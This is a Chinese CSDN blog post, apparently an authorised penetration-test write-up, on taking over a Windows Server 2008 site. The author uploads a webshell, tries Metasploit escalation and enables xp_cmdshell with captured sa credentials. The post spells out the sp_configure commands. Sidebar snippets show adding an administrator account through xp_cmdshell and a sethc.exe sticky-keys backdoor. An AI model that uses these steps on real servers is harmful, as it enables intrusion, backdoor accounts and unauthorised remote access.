mysql 2008提权_实战SQL Server提权

最新推荐文章于 2023-04-09 19:39:47 发布
最新推荐文章于 2023-04-09 19:39:47 发布
阅读量227 收藏
点赞数
文章标签: mysql 2008提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35501678/article/details/113419377
版权

前言:

在授权测试一网站时发现该网站已经被挂马。。

65c5a7dab9a4

aspx木马

猜测出密码为admin,即可看到大马。。

尝试自己的小马+菜刀进行连接。。

65c5a7dab9a4

65c5a7dab9a4

拒绝访问

发现该网站根目录下所有文件进行了访问控制。。无法上传自己的小马。

没有办法,只能翻翻文件看看。。

65c5a7dab9a4

公众号

getshell

看到了公众号的配置以及地址。。(打马的地方)

该文件夹下没有做访问控制,顺利上传getshell。。

65c5a7dab9a4

upload

65c5a7dab9a4

success

ok!添加管理员,打开3389。。

发现3389默认开启。。

65c5a7dab9a4

3389

添加用户试试。。

65c5a7dab9a4

权限

哦哦!!权限不够,得提权。。

我选择使用metasploit。。上传msf马,将自己的metapsloit转发到公网的一个端口上。。来接受反弹的shell。

然后提权。。

65c5a7dab9a4

getsystem

windows  server 2008 安全性真可以。。后尝试UAC提权、dll提权、溢出漏洞提取。都不太好。

65c5a7dab9a4

no

65c5a7dab9a4

补丁

也许是补丁打的足够。。

峰回路转

换个思路吧。。继续翻文件。。

65c5a7dab9a4

sa

看到了SQL Server数据库用户名、密码。。

65c5a7dab9a4

ok

65c5a7dab9a4

ok

那就用SQL Server数据库通过开启xp_cmdshell组件来提权。。还好我做过这个实验。。sp_configure 'show advanced options',1;reconfigure  go;sp_configure 'xp_cmdshell',1;reconfigure go

exec  sp_configure  'show advanced options', 1; RECONFIGURE  WITH  OVERRIDE;  EXEC sp_configure  'xp_cmdshell', 1; RECONFIGURE  WITH  OVERRIDE ;

注:上面两个命令都是我用的。。只是不知道到底哪个起了作用,所以都写上吧。。再不行可以一句句执行。。

最后,成功开启xp_cmshell组件。。

65c5a7dab9a4

ipconfig

65c5a7dab9a4

system

成功提权。。添加用户,端口转发到公网。。

mstsc

65c5a7dab9a4

success

韩艺萌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 2008提权_通过Mssql提权的几种姿势
weixin_33134753的博客
02-26 299
本文记录针对SQL Server数据库,在拿到shell之后进行提权的5种方法。一、 xp_cmdshell提权上面的数据库连接需要知道sa的密码,连接之后,在下面的sql命令处执行:exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add'就能成功的创建一个账户aaa并且加到...
微软SQLMySQL数据库实战训练营
最新发布
11-16
在“微软SQLMySQL数据库实战训练营”中,学员们将深入学习两种广泛使用的数据库管理系统——微软的SQL Server和开源的MySQL。这两种数据库系统在现代IT环境中占据着至关重要的地位,尤其是在数据存储、管理和分析...
sql-server 提权
dieqiang4646的博客
09-19 187
  数据库开启cmdshell EXEC sp_configure 'show advanced options', 1 GO RECONFIGURE GO EXEC sp_configure 'xp_cmdshell',1 GO RECONFIGURE GO EXEC master..xp_cmdshell 'net use Z: \\192.168.11...
SQL提权语句整理
智童博客
03-23 5710
------------------------------CMD语句--------------------------------------- query user   查看会话 logoff       踢人命令 5下shift后门 系统后门: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
BT提权wind2008R2
weixin_30820077的博客
01-23 222
昨天中午打开电脑,对着菜刀在那翻啊翻,找到一个64bit的os。 因为这个ip不在曾经提权过的主机列表里面,心想这应该是个低权限的网站,顺手打个whoami试试,结果给我返回了"nt authoritysystem"。看来这是一条"漏网之鱼"啊,于是就有了下面一段颇为蛋疼的经历。 查看系统信息,这是一台装了win server 2008 r2企业版的服务器,跑在VMware虚拟机上...
mssql,mysqll注入语法.zip_KMF_security_提权
09-24
标题“mssql,mysqll注入语法.zip_KMF_security_提权”表明这个压缩包文件主要关注的是SQL注入攻击相关的知识,特别是针对Microsoft SQL Server(mssql)和MySQL(通常拼写为mysql)数据库系统的安全问题。...
eshop_sql.rar_IT网站 mysql
09-14
这个压缩包主要用于搭建一个基于IT的在线购物平台,采用JSP(Java Server Pages)作为后端开发语言,配合MySQL数据库存储和管理数据。接下来,我们将深入探讨这个项目中涉及的主要知识点。 1. **JSP技术**: JSP是...
sql server 2008基础应用和开发实战教程(附视频)
01-08
该文档中包含关于sql server 2008版本的所有基础知识,从基础的理论知识到实践代码,针对每个知识,都附带对应的视频教程。
SQL.rar_sql_sql 习题
09-14
SQL已成为国际标准,并被所有主流关系数据库管理系统(如MySQL、Oracle、Microsoft SQL Server、PostgreSQL等)广泛支持。 2. **SQL基本操作**: - **查询(SELECT)**:这是SQL中最常用的命令,用于从数据库中...
soap注入某sql2008服务器结合msf进行提权
weixin_34228662的博客
06-05 386
soap注入某sql2008服务器结合msf进行提权simeon    在实际成功×××过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次×××利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的...
Windows权限提升 —SQL Server/MSSQL数据库提权
剁椒鱼头没剁椒的博客
03-21 2134
在之前的Windows权限提升—MySQL数据库提权中已经介绍了关于数据库方面的权限提升,同时在Windows权限提升—溢出提权的时候,简要的介绍了关于Windows提权方面整体的流程与方式,这里就不再赘述,直接进行Windows权限提升—SQL Server/MSSQL数据库的提权SQL Server与MSSQL其实就是一个东西,只是叫法不同。Windows权限提升—MySQL数据库Windows权限提升—溢出提权
Day5——提权学习之MSSQL数据库提权学习总结
0nc3的博客
12-19 558
0x00 SQLServer提权基础 1、SQLServer权限 列出sql server 角色用户的权限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述: 1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插入到数据库的域帐号而设计. 2.dbcr...
SQL语句直接开启3389(转)
weixin_33841503的博客
07-31 144
(( SQL语句直接开启3389 )) 3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则 表示关闭。 ...
MSSQL提权
m0_72929851的博客
04-09 224
默认库判断服务器级别判断数据库级别。
SQL Server 数据库提权的几种方法——提权教程
热门推荐
W小哥
01-20 1万+
一、简介 在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行提权。 数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 二、使用xp_cmdshell进行提权 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。 启用: EXEC sp_configure ‘show advanced opti
利用MSSQL getshell
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填写目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
SQL SERVER 2012实战入门与问题解析
SQL Server虽然在某些场景下可能不如MySQL流行,但在高可用性和复杂事务处理方面具有优势。 此外,书中批评了过度依赖编码和反复修改的开发习惯,强调项目管理的重要性,即规划、分析、设计、开发和测试应该作为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值